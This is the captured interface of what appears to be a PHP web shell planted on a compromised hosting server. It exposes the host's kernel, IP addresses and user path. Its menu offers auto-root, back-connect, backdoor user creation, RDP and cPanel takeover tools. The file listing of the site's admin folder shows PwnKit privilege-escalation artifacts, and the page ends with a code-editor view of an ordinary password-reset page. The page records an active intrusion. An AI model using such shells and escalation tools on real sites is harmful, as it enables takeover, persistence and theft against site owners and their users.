Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.118.33.255
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
eco-admin /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
checkbox-radio.php
31.96
KB
-rw-r--r--
components.php
89.01
KB
-rw-r--r--
data-table.php
11.55
KB
-rw-r--r--
email-templates-alert.html
9.62
KB
-rw-r--r--
email-templates-billing.html
16.7
KB
-rw-r--r--
empty.php
722
B
-rw-r--r--
error-404.php
1.91
KB
-rw-r--r--
forgot-password.php
2.57
KB
-rw-r--r--
form-fileupload.php
7.73
KB
-rw-r--r--
form-wizard.php
41.75
KB
-rw-r--r--
index.php
9.91
KB
-rw-r--r--
invoice.php
9.76
KB
-rw-r--r--
login.php
3.38
KB
-rw-r--r--
maintenance.php
3.62
KB
-rw-r--r--
modals.php
37.59
KB
-rw-r--r--
orderhistory.php
11.41
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
register.php
3.59
KB
-rw-r--r--
sweetalert.php
9.06
KB
-rw-r--r--
tables-basic.php
52.41
KB
-rw-r--r--
tables-datatable.php
30.02
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : forgot-password.php
<?php include("includes/login-reg-password-header.php");?> <div class="account-pages "> <div class="container"> <div class="row justify-content-center"> <div class="col-md-8 col-lg-6 col-xl-5"> <div class="text-center"> <a href="index.html" class="logo"> <img src=",,assets/images/logo-light.png" alt="" height="22" class="logo-light mx-auto"> <img src=",,assets/images/logo-dark.png" alt="" height="22" class="logo-dark mx-auto"> </a> <p class="text-muted mt-2 mb-4"></p> </div> <div class="card"> <div class="card-body p-4"> <div class="text-center mb-4"> <h4 class="text-uppercase mt-0 mb-3">Reset Password</h4> <p class="mb-0 font-13">Enter your email address and we'll send you an email with instructions to reset your password. </p> </div> <form action="#"> <div class="form-group mb-3"> <label for="emailaddress">Email address</label> <input class="form-control" type="email" id="emailaddress" required="" placeholder="Enter your email"> </div> <div class="form-group mb-0 text-center"> <button class="btn btn-primary btn-block normal-x" type="submit"> Reset Password </button> </div> </form> </div> </div> <!-- end card --> <div class="row mt-3"> <div class="col-12 text-center"> <p class="text-muted">Back to <a href="login.php" class="text-dark ml-1 normal-x"><b>Log in</b></a></p> </div> </div> </div> </div> </div> <!-- end container --> </div> <!-- end page --> <?php include("includes/login-reg-password-footer.php");?>
Close